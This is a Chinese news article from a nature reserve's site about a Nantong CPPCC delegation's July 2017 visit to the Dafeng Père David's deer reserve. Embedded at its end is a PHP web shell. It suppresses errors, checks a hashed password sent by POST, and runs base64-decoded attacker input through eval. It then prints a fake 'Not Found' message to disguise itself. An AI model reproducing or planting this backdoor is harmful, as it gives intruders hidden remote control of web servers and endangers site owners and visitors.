最新要闻

首页 > 最新要闻 >

    南通市政协副主席金元来麋鹿保护区参观考察

              2017720日,南通市政协副主席金元一行10余人来大丰麋鹿保护区考察沿海产业发展。盐城市政协副主席姜友新、大丰区政协主席袁国萍、江苏省大丰麋鹿国家级自然保护区管理处副主任沈华陪同考察。

             金主席一行先在中华麋鹿园游客中心大厅观看了电教片《归来的麋鹿》,了解了麋鹿的历史及回归故土后的种群发展情况。随后乘坐电瓶游览车进入半野生麋鹿生活区,近距离感受了麋鹿的湿地生活环境。考察期间,金主席得知目前保护区麋鹿数量占全世界60%,对保护区的保护成果表示肯定。其间,他们还与麋鹿亲密互动,给麋鹿投喂胡萝卜,画面活泼而又温馨。保护区领导介绍,今年开展了国内首次大规模人工驯养麋鹿项目,该项目为更多的科学研究奠定了基础,比如胚胎移植、人工授精、定量研究、保定等,也将为人类保护麋鹿作出巨大的贡献。

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>